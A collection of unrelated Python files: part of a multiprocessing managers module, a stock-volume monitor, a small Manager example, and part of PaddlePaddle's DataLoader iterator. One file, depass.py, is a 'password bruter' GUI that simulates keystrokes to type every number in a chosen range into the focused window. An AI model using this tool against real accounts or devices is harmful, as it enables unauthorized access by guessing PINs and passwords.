def __getattr__(self, key):
if key[0] == '_':
return object.__getattribute__(self, key)
callmethod = object.__getattribute__(self, '_callmethod')
return callmethod('__getattribute__', (key,))
def __setattr__(self, key, value):
if key[0] == '_':
return object.__setattr__(self, key, value)
callmethod = object.__getattribute__(self, '_callmethod')
return callmethod('__setattr__', (key, value))
def __delattr__(self, key):
if key[0] == '_':
return object.__delattr__(self, key)
callmethod = object.__getattribute__(self, '_callmethod')
return callmethod('__delattr__', (key,))
class ValueProxy(BaseProxy):
_exposed_ = ('get', 'set')
def get(self):
return self._callmethod('get')
def set(self, value):
return self._callmethod('set', (value,))
value = property(get, set)
BaseListProxy = MakeProxyType('BaseListProxy', (
'__add__', '__contains__', '__delitem__', '__getitem__', '__len__',
'__mul__', '__reversed__', '__rmul__', '__setitem__',
'append', 'count', 'extend', 'index', 'insert', 'pop', 'remove',
'reverse', 'sort', '__imul__'
))
class ListProxy(BaseListProxy):
def __iadd__(self, value):
self._callmethod('extend', (value,))
return self
def __imul__(self, value):
self._callmethod('__imul__', (value,))
return self
DictProxy = MakeProxyType('DictProxy', (
'__contains__', '__delitem__', '__getitem__', '__iter__', '__len__',
'__setitem__', 'clear', 'copy', 'get', 'has_key', 'items',
'keys', 'pop', 'popitem', 'setdefault', 'update', 'values'
))
DictProxy._method_to_typeid_ = {
'__iter__': 'Iterator',
}
ArrayProxy = MakeProxyType('ArrayProxy', (
'__len__', '__getitem__', '__setitem__'
))
BasePoolProxy = MakeProxyType('PoolProxy', (
'apply', 'apply_async', 'close', 'imap', 'imap_unordered', 'join',
'map', 'map_async', 'starmap', 'starmap_async', 'terminate',
))
BasePoolProxy._method_to_typeid_ = {
'apply_async': 'AsyncResult',
'map_async': 'AsyncResult',
'starmap_async': 'AsyncResult',
'imap': 'Iterator',
'imap_unordered': 'Iterator'
}
class PoolProxy(BasePoolProxy):
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.terminate()
#
# Definition of SyncManager
#
class SyncManager(BaseManager):
'''
Subclass of `BaseManager` which supports a number of shared object types.
The types registered are those intended for the synchronization
of threads, plus `dict`, `list` and `Namespace`.
The `multiprocess.Manager()` function creates started instances of
this class.
'''
SyncManager.register('Queue', queue.Queue)
SyncManager.register('JoinableQueue', queue.Queue)
SyncManager.register('Event', threading.Event, EventProxy)
SyncManager.register('Lock', threading.Lock, AcquirerProxy)
SyncManager.register('RLock', threading.RLock, AcquirerProxy)
SyncManager.register('Semaphore', threading.Semaphore, AcquirerProxy)
SyncManager.register('BoundedSemaphore', threading.BoundedSemaphore,
AcquirerProxy)
SyncManager.register('Condition', threading.Condition, ConditionProxy)
SyncManager.register('Barrier', threading.Barrier, BarrierProxy)
SyncManager.register('Pool', pool.Pool, PoolProxy)
SyncManager.register('list', list, ListProxy)
SyncManager.register('dict', dict, DictProxy)
SyncManager.register('Value', Value, ValueProxy)
SyncManager.register('Array', Array, ArrayProxy)
SyncManager.register('Namespace', Namespace, NamespaceProxy)
# types returned by methods of PoolProxy
SyncManager.register('Iterator', proxytype=IteratorProxy, create_method=False)
SyncManager.register('AsyncResult', create_method=False)
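# Hedged usage sketch (not part of this module; the names and values below are
# invented for illustration):
#
#   m = SyncManager()
#   m.start()                       # spawns the server process
#   d = m.dict(); d['answer'] = 42  # DictProxy backed by the server
#   lock = m.Lock()                 # AcquirerProxy usable across processes
#   m.shutdown()
#
# Each register() call above turns the typeid into a creation method such as
# m.dict() or m.Lock() on started manager instances.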
#
# Definition of SharedMemoryManager and SharedMemoryServer
#
if HAS_SHMEM:
class _SharedMemoryTracker:
"Manages one or more shared memory segments."
def __init__(self, name, segment_names=[]):
self.shared_memory_context_name = name
self.segment_names = segment_names
def register_segment(self, segment_name):
"Adds the supplied shared memory block name to tracker."
util.debug(f"Register segment {segment_name!r} in pid {getpid()}")
self.segment_names.append(segment_name)
def destroy_segment(self, segment_name):
"""Calls unlink() on the shared memory block with the supplied name
and removes it from the list of blocks being tracked."""
util.debug(f"Destroy segment {segment_name!r} in pid {getpid()}")
self.segment_names.remove(segment_name)
segment = shared_memory.SharedMemory(segment_name)
segment.close()
segment.unlink()
def unlink(self):
"Calls destroy_segment() on all tracked shared memory blocks."
for segment_name in self.segment_names[:]:
self.destroy_segment(segment_name)
def __del__(self):
util.debug(f"Call {self.__class__.__name__}.__del__ in {getpid()}")
self.unlink()
def __getstate__(self):
return (self.shared_memory_context_name, self.segment_names)
def __setstate__(self, state):
self.__init__(*state)
class SharedMemoryServer(Server):
public = Server.public + \
['track_segment', 'release_segment', 'list_segments']
def __init__(self, *args, **kwargs):
Server.__init__(self, *args, **kwargs)
address = self.address
# The address of Linux abstract namespaces can be bytes
if isinstance(address, bytes):
address = os.fsdecode(address)
self.shared_memory_context = \
_SharedMemoryTracker(f"shm_{address}_{getpid()}")
util.debug(f"SharedMemoryServer started by pid {getpid()}")
def create(*args, **kwargs):
"""Create a new distributed-shared object (not backed by a shared
memory block) and return its id to be used in a Proxy Object."""
# Unless set up as a shared proxy, don't make shared_memory_context
# a standard part of kwargs. This makes things easier for supplying
# simple functions.
            if not args:
                raise TypeError("descriptor 'create' of 'SharedMemoryServer' "
                                "object needs an argument")
            # 'self' is not a named parameter in this descriptor-style signature,
            # so unpack the instance explicitly before it is used below.
            self = args[0]
            if len(args) >= 3:
                typeid = args[2]
            elif 'typeid' in kwargs:
                typeid = kwargs['typeid']
            else:
                raise TypeError('create expected at least 2 positional '
                                'arguments, got %d' % (len(args)-1))
            if hasattr(self.registry[typeid][-1], "_shared_memory_proxy"):
kwargs['shared_memory_context'] = self.shared_memory_context
return Server.create(*args, **kwargs)
create.__text_signature__ = '($self, c, typeid, /, *args, **kwargs)'
def shutdown(self, c):
"Call unlink() on all tracked shared memory, terminate the Server."
self.shared_memory_context.unlink()
return Server.shutdown(self, c)
def track_segment(self, c, segment_name):
"Adds the supplied shared memory block name to Server's tracker."
self.shared_memory_context.register_segment(segment_name)
def release_segment(self, c, segment_name):
"""Calls unlink() on the shared memory block with the supplied name
and removes it from the tracker instance inside the Server."""
self.shared_memory_context.destroy_segment(segment_name)
def list_segments(self, c):
"""Returns a list of names of shared memory blocks that the Server
is currently tracking."""
return self.shared_memory_context.segment_names
class SharedMemoryManager(BaseManager):
"""Like SyncManager but uses SharedMemoryServer instead of Server.
It provides methods for creating and returning SharedMemory instances
and for creating a list-like object (ShareableList) backed by shared
memory. It also provides methods that create and return Proxy Objects
that support synchronization across processes (i.e. multi-process-safe
locks and semaphores).
"""
_Server = SharedMemoryServer
def __init__(self, *args, **kwargs):
if os.name == "posix":
# bpo-36867: Ensure the resource_tracker is running before
# launching the manager process, so that concurrent
# shared_memory manipulation both in the manager and in the
# current process does not create two resource_tracker
# processes.
from . import resource_tracker
resource_tracker.ensure_running()
BaseManager.__init__(self, *args, **kwargs)
util.debug(f"{self.__class__.__name__} created by pid {getpid()}")
def __del__(self):
util.debug(f"{self.__class__.__name__}.__del__ by pid {getpid()}")
pass
def get_server(self):
'Better than monkeypatching for now; merge into Server ultimately'
if self._state.value != State.INITIAL:
if self._state.value == State.STARTED:
raise ProcessError("Already started SharedMemoryServer")
elif self._state.value == State.SHUTDOWN:
raise ProcessError("SharedMemoryManager has shut down")
else:
raise ProcessError(
"Unknown state {!r}".format(self._state.value))
return self._Server(self._registry, self._address,
self._authkey, self._serializer)
def SharedMemory(self, size):
"""Returns a new SharedMemory instance with the specified size in
bytes, to be tracked by the manager."""
with self._Client(self._address, authkey=self._authkey) as conn:
sms = shared_memory.SharedMemory(None, create=True, size=size)
try:
dispatch(conn, None, 'track_segment', (sms.name,))
except BaseException as e:
sms.unlink()
raise e
return sms
def ShareableList(self, sequence):
"""Returns a new ShareableList instance populated with the values
from the input sequence, to be tracked by the manager."""
with self._Client(self._address, authkey=self._authkey) as conn:
sl = shared_memory.ShareableList(sequence)
try:
dispatch(conn, None, 'track_segment', (sl.shm.name,))
except BaseException as e:
sl.shm.unlink()
raise e
return sl
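        # Hedged usage sketch for SharedMemoryManager (assumes Python >= 3.8 with
        # multiprocessing.shared_memory available; the names below are
        # illustrative only):
        #
        #   with SharedMemoryManager() as smm:
        #       sl = smm.ShareableList(range(5))    # backed by a shared memory block
        #       shm = smm.SharedMemory(size=128)    # raw block, tracked by the manager
        #   # leaving the with-block shuts the manager down, and the tracked
        #   # segments are unlinked via SharedMemoryServer.shutdown().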
|
depass.py
|
#-*- coding: utf-8 -*-
from pykeyboard import PyKeyboard
import itertools
import time
import tkinter as tk
import tkinter.messagebox
import threading
import inspect
import ctypes
import win32con
import ctypes.wintypes
import pygame,os,sys
from tkinter import ttk
global T1,T2 # T1 holds the brute-force thread, T2 holds the progress-bar thread
global maximum
global start,end,sleep,step
maximum = 200 # full scale of the progress bar
window = tk.Tk()
k = PyKeyboard()
SLEEP=tk.DoubleVar() # bound to the scale widget
GO=False # flag: start brute forcing
STOP=False # flag: stop brute forcing
EXIT = False # flag: exit the program
user32 = ctypes.windll.user32 # load user32.dll
# unique ids used to register and distinguish the hotkeys
id1=109 #F1 (brute)
id2=110 #F2 (stop brute)
id3=111 #F3 (stop program)
def __start_end(): # read the start and end values typed into the entries
    global start,end,step
    start = int(START.get())
    end = int(END.get())
    step = maximum / (end - start +1) # progress-bar units to advance per attempt
return
def start_end():
T = threading.Thread(target=__start_end)
    T.setDaemon(True) # daemon thread: dies when the main program exits
    T.start()
def __interval(): # set the delay between attempts
    global sleep
    sleep = SLEEP.get()
    return
def interval(value): # called by the Scale widget with the new slider value (unused; SLEEP is read directly)
    T = threading.Thread(target=__interval)
    T.setDaemon(True)
    T.start()
def __brute(): # run the brute-force loop
    global sleep,start,end
    ns = itertools.count(start) # reset the iterator; ns counts up from `start`
    j = itertools.takewhile(lambda x:x<=end,ns) # j is ns truncated at `end`
    time.sleep(3) # 3-second delay before the attempts begin
    progress() # start advancing the progress bar
    for i in j:
        time.sleep(sleep)
        k.type_string(str(i))
        time.sleep(0.001) # interval between key presses
k.tap_key(k.enter_key)
# print(p1['value'])
return
def brute():
global T1
T1 = threading.Thread(target=__brute)
T1.setDaemon(True)
T1.start()
def __stop_thread(thread):
_async_raise(thread.ident, SystemExit)
def stop_thread():
    __stop_thread(T1) # terminate the brute-force thread
    __stop_thread(T2) # terminate the progress-bar thread
    p1['value'] = 0 # reset the progress bar
def __monitor(): # watch whether a hotkey flag has been raised
    global GO,STOP,EXIT
    while(True):
        if GO==True:
            # start brute forcing
            brute()
            GO=False
        elif STOP==True:
            # stop brute forcing
            stop_thread()
            STOP=False
        elif EXIT==True:
            # exit the program
            window.destroy()
def monitor():
    T = threading.Thread(target=__monitor) # thread that watches the hotkey flags
T.setDaemon(True)
T.start()
def __playSans(): # play the background sound
    pygame.mixer.init() # initialize the sound playback module
    APP_FOLDER = os.path.dirname(os.path.realpath(sys.argv[0])) # directory containing this script
    os.chdir(APP_FOLDER) # change the current working directory to it
    pygame.mixer.music.load("sans.ogg") # load the ogg file
    pygame.mixer.music.play(-1, 0) # -1 means loop forever, starting at 0 seconds
def playSans():
    T = threading.Thread(target=__playSans) # playback thread
    T.setDaemon(True)
    T.start()
def __progress(): # advance the progress bar
    num = end - start + 1 # num codes are tried in one run
for i in range(1, num + 1):
time.sleep(0.023)
time.sleep(sleep)
p1.step(step)
window.update()
p1['value'] = maximum
# for i in range(start,end+1):
# p1['value'] = i
# window.update()
# #print(i)
# time.sleep(sleep)
def progress(): # spawn the progress-bar thread
    global T2
    T2 = threading.Thread(target=__progress)
    T2.setDaemon(True) # daemon thread: dies when the main program exits
    T2.start()
def _async_raise(tid, exctype): # helper used to terminate a thread
"""raises the exception, performs cleanup if needed"""
tid = ctypes.c_long(tid)
if not inspect.isclass(exctype):
exctype = type(exctype)
res = ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, ctypes.py_object(exctype))
if res == 0:
raise ValueError("invalid thread id")
elif res != 1:
# """if it returns a number greater than one, you're in trouble,
# and you should call it again with exc=NULL to revert the effect"""
ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, None)
raise SystemError("PyThreadState_SetAsyncExc failed")
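# Note: _async_raise injects an exception asynchronously (e.g.
# _async_raise(T1.ident, SystemExit)); the target thread only sees it when it
# next executes Python bytecode, so a thread blocked inside a C call such as
# time.sleep() stops only after that call returns.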
def closeWindow(): # ask for confirmation when the window's close button is clicked
    ans = tk.messagebox.askyesno(title='Warning',message='Close the application?',default='no')
    if ans:
        window.destroy()
    else:
        return
class Hotkey(threading.Thread): # threading.Thread subclass that registers the hotkeys
    def run(self):
        global GO,STOP,EXIT # globals shared across threads
        if not user32.RegisterHotKey(None, id1, 0, win32con.VK_F1): # register F1 (start brute forcing) and check for success
            print("Unable to register id", id1) # report the failure
        if not user32.RegisterHotKey(None, id2, 0, win32con.VK_F2): # register F2 (stop brute forcing) and check for success
            print("Unable to register id", id2)
        if not user32.RegisterHotKey(None, id3, 0, win32con.VK_F3): # register F3 (exit the program) and check for success
            print("Unable to register id", id3)
        # below: detect hotkey presses and release the hotkeys at the end
        try:
            msg = ctypes.wintypes.MSG()
            while True:
                if user32.GetMessageA(ctypes.byref(msg), None, 0, 0) != 0:
                    if msg.message == win32con.WM_HOTKEY:
                        if msg.wParam == id1: # hotkey triggered
GO = True
elif msg.wParam == id2:
STOP = True
elif msg.wParam == id3:
EXIT = True
user32.TranslateMessage(ctypes.byref(msg))
user32.DispatchMessageA(ctypes.byref(msg))
finally:
            user32.UnregisterHotKey(None, id1) # the hotkeys must be released, otherwise the next registration fails;
            # if the program exits abnormally without releasing them, registration will likely fail next time -- try a different hotkey in that case
            user32.UnregisterHotKey(None, id2)
            user32.UnregisterHotKey(None, id3)
monitor() # watch the hotkey flags
playSans() # play the sound
hotkey = Hotkey() # create the hotkey thread
hotkey.setDaemon(True)
hotkey.start()
window.protocol('WM_DELETE_WINDOW', closeWindow) # call closeWindow when the window close button is clicked
# GUI layout below
window.title('password bruter')
window.geometry('600x360') # window size
l = tk.Label(window, text="Brute every 'sleep' seconds from 'start' to 'end' which you set BELOW", font=('Arial', 11, 'bold'), width=100, height=2)
l.pack() # title label
m = tk.Label(window, text="Press 'F3' to quit the program! ! !", font=('Arial', 11, 'bold'), width=50, height=1, underline='8')
m.pack()
stitle = tk.Label(window, text='start')
stitle.pack()
START = tk.Entry(window, cursor='plus', width=15) # entry for the start value
START.pack()
etitle = tk.Label(window, text='end')
etitle.pack()
END = tk.Entry(window, cursor='plus', width=15) # entry for the end value
END.pack()
b1 = tk.Button(window, text='ok', width=14, height=1, command=start_end) # button b1: confirm start/end
b1.pack()
s = tk.Scale(window, label='select sleep interval', cursor='circle', sliderrelief='raised', sliderlength=50, tickinterval=0.2, bd=5, from_=0, to=1, resolution=0.001, orient=tk.HORIZONTAL, length=400, variable=SLEEP, command=interval)
s.pack() # slider that sets the sleep interval
p1 = ttk.Progressbar(window, length=400, orient=tk.HORIZONTAL, mode='determinate')
p1.pack()
p1['maximum'] = maximum
b2 = tk.Button(window, text='start blasting(F1)', width=15, height=1, underline=16, command=brute)
b2.pack(side='left', anchor='w', padx=50) # button b2: start brute forcing
b3 = tk.Button(window, text='stop blasting(F2)', width=15, height=1, underline=15, command=stop_thread)
b3.pack(side='right', anchor='e', padx=50) # button b3: stop the brute-force thread
window.mainloop()
|
real_time_big_deal.py
|
# -*-coding=utf-8-*-
__author__ = 'Rocky'
'''
http://30daydo.com
Contact: weigesysu@qq.com
'''
import datetime
import tushare as ts
import pandas as pd
import time,os,threading
import numpy as np
from toolkit import Toolkit
pd.set_option('display.max_rows',None)
class BigMonitor():
def __init__(self):
path=os.path.join(os.getcwd(),'data')
if os.path.exists(path)==False:
os.mkdir(path)
print("Please put data under data folder")
exit()
os.chdir(path)
self.stockList=Toolkit.read_stock('mystock.csv')
        self.bases=pd.read_csv('bases.csv',dtype={'code':str})
def loop(self,code):
name=self.bases[self.bases['code']==code]['name'].values[0]
print(name)
while 1:
time.sleep(2)
df_t1=ts.get_realtime_quotes(code)
            v1=int(df_t1['volume'].values[0])
            p1=float(df_t1['price'].values[0])
            #print(df_t1)
            time.sleep(2)
            df_t2=ts.get_realtime_quotes(code)
            v2=int(df_t2['volume'].values[0])
            p2=float(df_t2['price'].values[0])
            delta_v=(v2-v1)/100
            # convert shares to lots (1 lot = 100 shares)
            # compute the price difference
            price_v=p2-p1
if delta_v >1000:
print(datetime.datetime.now().strftime('%H:%M:%S'))
print("Big deal on %s" %name,)
print(delta_v,'price diff',price_v)
def multi_thread(self,code_list):
thread_list=[]
for i in code_list:
t=threading.Thread(target=self.loop,args=(i,))
thread_list.append(t)
for j in thread_list:
j.start()
def testcase(self):
self.multi_thread(self.stockList)
def main():
obj=BigMonitor()
obj.testcase()
main()
|
mp10manager.py
|
#!/usr/bin/env python
"""mp10manager.py: Use multiprocessing.Manager.
Usage:
mp10manager.py
"""
import multiprocessing as mp
def f(d, l):
d[1] = '1'
d['2'] = 2
d[0.25] = None
l.reverse()
def main():
with mp.Manager() as mgr:
d = mgr.dict()
l = mgr.list(range(10))
p = mp.Process(target=f, args=(d, l,))
p.start()
p.join()
print(d, l)
if __name__ == '__main__':
main()
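# Running this module prints the manager-backed dict and the reversed list,
# e.g. (dict key order may vary): {1: '1', '2': 2, 0.25: None} [9, 8, 7, 6, 5, 4, 3, 2, 1, 0]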
|
dataloader_iter.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import six
import sys
import time
import signal
import logging
import itertools
import threading
import numpy as np
import multiprocessing
# NOTE: queue has a different name in python2 and python3
if six.PY2:
import Queue as queue
else:
import queue
from .. import core
from ..framework import in_dygraph_mode
from ..multiprocess_utils import CleanupFuncRegistrar, _cleanup_mmap, _set_SIGCHLD_handler
# interval (in seconds) at which multi-process workers poll the indices
# queue, to avoid hanging during subprocess data loading
MP_INDICES_CHECK_INTERVAL = 5
def _default_collate_fn(batch):
sample = batch[0]
# dataset has only 1 field
if isinstance(sample, np.ndarray):
return [np.stack(batch, axis=0)]
# batch each field
slots = []
for items in batch:
for i, item in enumerate(items):
if len(slots) < len(items):
slots.append([item])
else:
slots[i].append(item)
return [np.stack(slot, axis=0) for slot in slots]
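# A small illustration (not called anywhere in this module) of what
# _default_collate_fn produces for a two-field dataset; the shapes are made up.
def _collate_fn_example():
    batch = [(np.zeros((3, 4)), np.array(0)), (np.ones((3, 4)), np.array(1))]
    fields = _default_collate_fn(batch)
    # fields[0].shape == (2, 3, 4)  -- first field stacked along a new batch axis
    # fields[1].shape == (2,)       -- labels stacked the same way
    return fields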
class ParentWatchDog(object):
def __init__(self):
self._parent_pid = os.getppid()
self._parent_alive = True
def is_alive(self):
if self._parent_alive:
self._parent_alive = os.getppid() == self._parent_pid
return self._parent_alive
class _DataLoaderIterBase(object):
"""
    Iterator implementation of DataLoader; loads and feeds mini-batch
    data according to the settings of the given dataloader.
Args:
loader(instance of DataLoader): instance of `fluid.io.DataLoader`
"""
def __init__(self, loader):
self._dataset = loader.dataset
self._feed_list = loader.feed_list or []
self._places = loader.places
self._return_list = loader.return_list
self._batch_sampler = loader.batch_sampler
self._sampler_iter = iter(loader.batch_sampler)
self._collate_fn = loader.collate_fn or _default_collate_fn
self._num_workers = loader.num_workers
self._use_buffer_reader = loader.use_buffer_reader
self._use_shared_memory = loader.use_shared_memory
self._timeout = loader.timeout if loader.timeout > 0 else MP_INDICES_CHECK_INTERVAL
self._worker_init_fn = loader.worker_init_fn
        # LoDTensorBlockingQueue instance for create_py_reader and a thread
        # that puts mini-batch data into self._blocking_queue; mini-batch data
        # is fetched from:
# 1. multi-process mode: get data from workers' result queue
# 2. single-process mode: read mini-batch data in main process
self._blocking_queue = None
self._thread = None
self._thread_done_event = threading.Event()
def __iter__(self):
return self
def __len__(self):
return len(self._batch_sampler)
class _DataLoaderIterSingleProcess(_DataLoaderIterBase):
"""
    Single-process implementation of DataLoaderIter, loading data from
    the loader's dataset in the main process
"""
def __init__(self, loader):
super(_DataLoaderIterSingleProcess, self).__init__(loader)
        # NOTE: len(self._places) batches are composed into one output
        # iteration, so the blocking_queue is sized here to cache at most
        # 2 iterations of data
self._blocking_queue_capacity = 2 * len(self._places)
self._init_thread()
def _init_thread(self):
self._var_names = [v.name for v in self._feed_list]
self._shapes = [v.shape for v in self._feed_list]
self._dtypes = [v.dtype for v in self._feed_list]
self._need_check_feed = [
v.desc.need_check_feed() for v in self._feed_list
]
# if only 1 place, do not need to keep order
self._blocking_queue = core.init_lod_tensor_blocking_queue(
core.Variable(), self._blocking_queue_capacity,
len(self._places) > 1)
self._reader = core.create_py_reader(
self._blocking_queue, self._var_names, self._shapes, self._dtypes,
self._need_check_feed, self._places, self._use_buffer_reader, True)
self._thread = threading.Thread(target=self._thread_loop)
self._thread.daemon = True
self._thread.start()
def _thread_loop(self):
try:
for indices in self._sampler_iter:
# read data from dataset in mini-batch
batch = [self._dataset[i] for i in indices]
if self._collate_fn is not None:
batch = self._collate_fn(batch)
# pack as LoDTensorArray
array = core.LoDTensorArray()
for slot in batch:
if not isinstance(slot, core.LoDTensor):
self._check_input_array(slot)
tmp = core.LoDTensor()
tmp.set(slot, core.CPUPlace())
slot = tmp
array.append(slot)
if not self._blocking_queue.push(array):
break
self._blocking_queue.close()
self._thread = None
except Exception:
self._blocking_queue.kill()
self._thread = None
logging.warning("DataLoader reader thread raised an exception.")
six.reraise(*sys.exc_info())
@classmethod
def _check_input_array(cls, item):
arr = np.array(item)
if arr.dtype == np.object:
raise TypeError((
"\n\tFaild to convert input data to a regular ndarray :\n\t* Usually "
"this means the input data contains nested lists with different lengths. "
"\n\t* Check the reader function passed to 'decorate_batch_generator'"
" to locate the data causes this issue.\n\t* Please consider using "
"'fluid.create_lod_tensor' to convert it to a LoD-Tensor."))
def __next__(self):
try:
if in_dygraph_mode():
return self._reader.read_next_var_list()
else:
if self._return_list:
return self._reader.read_next_list()
else:
return self._reader.read_next()
except StopIteration:
self._reader.reset()
six.reraise(*sys.exc_info())
# python2 compatibility
def next(self):
return self.__next__()
class _DataLoaderIterMultiProcess(_DataLoaderIterBase):
def __init__(self, loader):
super(_DataLoaderIterMultiProcess, self).__init__(loader)
assert self._num_workers > 0, "Multi-process DataLoader " \
"invalid num_workers({})".format(self._num_workers)
        # subprocess workers' result queue
self._data_queue = None
        # data fetched from _data_queue is reordered by _rcvd_idx to keep
        # the batch order; batches whose index does not equal _rcvd_idx
        # are cached in _reorder_dict
self._send_idx = 0
self._rcvd_idx = 0
self._batches_outstanding = 0
self._reorder_dict = {}
        # _outstanding_capacity indices are put out initially, and the
        # blocking_queue capacity is also _outstanding_capacity. This makes
        # sure each indices_queue holds at least 2 sets of indices, and that
        # the outstanding batches can cache output data for at least 2
        # iterations (note that len(_places) batches are composed into one
        # iteration output)
self._outstanding_capacity = 2 * max(self._num_workers,
len(self._places))
self._init_workers()
self._init_thread()
self._shutdown = False
for _ in range(self._outstanding_capacity):
self._try_put_indices()
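    # Ordering illustration: if worker results arrive as (idx=2, b2), (idx=0, b0),
    # (idx=1, b1), then _get_data caches b2 in _reorder_dict, returns b0 when its
    # idx matches _rcvd_idx (0), then b1, and finally pops b2 once _rcvd_idx
    # reaches 2, so batches are always consumed in the order they were sent.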
def _init_workers(self):
        # the multiprocess worker and indices queue lists start out empty
self._workers = []
self._worker_status = []
self._indices_queues = []
self._workers_idx_cycle = itertools.cycle(range(self._num_workers))
# create data_queue for workers
self._data_queue = multiprocessing.Queue()
        # events for the workers and the reader thread; the thread event is
        # only needed in multi-process mode
self._workers_done_event = multiprocessing.Event()
self._thread_done_event = threading.Event()
for i in range(self._num_workers):
indices_queue = multiprocessing.Queue()
self._indices_queues.append(indices_queue)
worker = multiprocessing.Process(
target=self._worker_loop,
args=(self._dataset, indices_queue, self._data_queue,
self._workers_done_event, self._collate_fn,
self._worker_init_fn, i))
worker.daemon = True
worker.start()
self._workers.append(worker)
self._worker_status.append(True)
core._set_process_pids(id(self), tuple(w.pid for w in self._workers))
_set_SIGCHLD_handler()
def _clear_and_remove_data_queue(self):
if self._data_queue is not None:
while True:
try:
self._data_queue.get_nowait()
except:
self._data_queue.cancel_join_thread()
self._data_queue.close()
break
def _init_thread(self):
self._var_names = [v.name for v in self._feed_list]
self._shapes = [v.shape for v in self._feed_list]
self._dtypes = [v.dtype for v in self._feed_list]
self._need_check_feed = [
v.desc.need_check_feed() for v in self._feed_list
]
# if only 1 place, do not need to keep order
self._blocking_queue = core.init_lod_tensor_blocking_queue(
core.Variable(), self._outstanding_capacity, len(self._places) > 1)
self._reader = core.create_py_reader(
self._blocking_queue, self._var_names, self._shapes, self._dtypes,
self._need_check_feed, self._places, self._use_buffer_reader, True)
self._thread_done_event = threading.Event()
self._thread = threading.Thread(target=self._thread_loop)
self._thread.daemon = True
self._thread.start()
def _shutdown_worker(self, worker_id):
if self._worker_status[worker_id]:
self._indices_queues[worker_id].put(None)
self._worker_status[worker_id] = False
def _try_shutdown_all(self):
if not self._shutdown:
try:
self._exit_thread_expectedly()
self._clear_and_remove_data_queue()
                # _workers_done_event should be set before putting None into
                # the indices_queues; workers will exit on reading None from
                # their indices_queue
self._workers_done_event.set()
for i in range(self._num_workers):
self._shutdown_worker(i)
for w in self._workers:
w.join()
for q in self._indices_queues:
q.cancel_join_thread()
q.close()
finally:
core._erase_process_pids(id(self))
self._shutdown = True
def _exit_thread_expectedly(self):
self._thread_done_event.set()
self._blocking_queue.close()
def _exit_thread_unexpectedly(self):
self._thread_done_event.set()
self._blocking_queue.kill()
logging.error("DataLoader reader thread raised an exception!")
def _worker_loop(self, dataset, indices_queue, out_queue, done_event,
collate_fn, init_fn, worker_id):
try:
# NOTE: [ mmap files clear ] When the child process exits unexpectedly,
# some shared memory objects may have been applied for but have not yet
# been put into the inter-process Queue. This part of the object needs
# to be cleaned up when the process ends.
CleanupFuncRegistrar.register(_cleanup_mmap)
# set signal handler
core._set_process_signal_handler()
init_exception = None
if init_fn is not None:
try:
init_fn(worker_id)
except:
init_exception = Exception("init_fn failed in worker {}: " \
"{}".format(worker_id, sys.exc_info()))
parent_watch_dog = ParentWatchDog()
while parent_watch_dog.is_alive():
try:
data = indices_queue.get(MP_INDICES_CHECK_INTERVAL)
except queue.Empty:
continue
                # None is the poison pill, so the worker done_event should already be set
if data is None:
assert done_event.is_set(
), "get None when worker done_event set"
break
                # If the worker done event is set but data is still read from
                # the indices_queue, the remaining data should be fetched and skipped.
if done_event.is_set():
continue
idx, indices = data
try:
if init_exception is not None:
batch = init_exception
init_exception = None
else:
batch = [dataset[i] for i in indices]
if self._collate_fn is not None:
batch = self._collate_fn(batch)
except Exception as e:
out_queue.put((idx, e))
else:
if self._use_shared_memory:
tensor_list = core._convert_to_tensor_list(batch)
out_queue.put((idx, tensor_list))
core._remove_tensor_list_mmap_fds(tensor_list)
else:
out_queue.put((idx, batch))
except KeyboardInterrupt:
            # NOTE: the main process will raise KeyboardInterrupt anyway, so ignore it in the child process
pass
except:
six.reraise(*sys.exc_info())
finally:
if self._use_shared_memory:
_cleanup_mmap()
def _thread_loop(self):
while not self._thread_done_event.is_set():
batch = self._get_data()
if not self._thread_done_event.is_set():
if batch is None:
self._exit_thread_expectedly()
elif isinstance(batch, Exception):
self._exit_thread_unexpectedly()
else:
try:
# pack as LoDTensorArray
array = core.LoDTensorArray()
if self._use_shared_memory:
for tensor in batch:
array.append(tensor)
else:
                            # a LoDTensor that is not in shared memory is not
                            # serializable and cannot be created in workers
for slot in batch:
if not isinstance(slot, core.LoDTensor):
# self._check_input_array(slot)
tmp = core.LoDTensor()
tmp.set(slot, core.CPUPlace())
slot = tmp
array.append(slot)
if not self._blocking_queue.push(array):
self._blocking_queue.close()
except:
self._exit_thread_unexpectedly()
six.reraise(*sys.exc_info())
finally:
self._rcvd_idx += 1
def _get_data(self):
if self._rcvd_idx in self._reorder_dict.keys():
return self._reorder_dict.pop(self._rcvd_idx)
while not self._thread_done_event.is_set():
try:
                # [ avoid hang ]: the main process may block at _reader.read_next
                # on KeyboardInterrupt, so we make the following tradeoff:
                # 1. get data with a timeout (MP_INDICES_CHECK_INTERVAL, 5s, by
                #    default); if a KeyboardInterrupt is blocking, failed workers
                #    are checked and a RuntimeError is raised inside the timeout
                #    exception handling to quit the DataLoader.
                # 2. if getting data times out and all workers are alive,
                #    continue trying to get data
data = self._data_queue.get(timeout=self._timeout)
except Exception as e:
# check if thread done event set when waiting data
if self._thread_done_event.is_set():
continue
# check failed workers
failed_workers = []
for i, w in enumerate(self._workers):
if self._worker_status[i] and not w.is_alive():
failed_workers.append(w)
self._shutdown_worker(i)
if len(failed_workers) > 0:
self._exit_thread_unexpectedly()
pids = ', '.join(str(w.pid) for w in failed_workers)
raise RuntimeError("DataLoader {} workers exit unexpectedly, " \
"pids: {}".format(len(failed_workers), pids))
# get(timeout) will call _poll(timeout) and may raise IOError
if isinstance(e, queue.Empty) or isinstance(e, IOError):
# continue on timeout to keep getting data from queue
continue
self._exit_thread_unexpectedly()
logging.error("DataLoader reader thread failed({}) to read data from " \
"workers' result queue.".format(e))
six.reraise(*sys.exc_info())
else:
idx, batch = data
if idx == self._rcvd_idx:
return batch
else:
self._reorder_dict[idx] = batch
continue
def _try_put_indices(self):
assert self._send_idx - self._rcvd_idx <= self._outstanding_capacity, \
"too many indices have been put to queue"
try:
indices = next(self._sampler_iter)
except StopIteration:
return
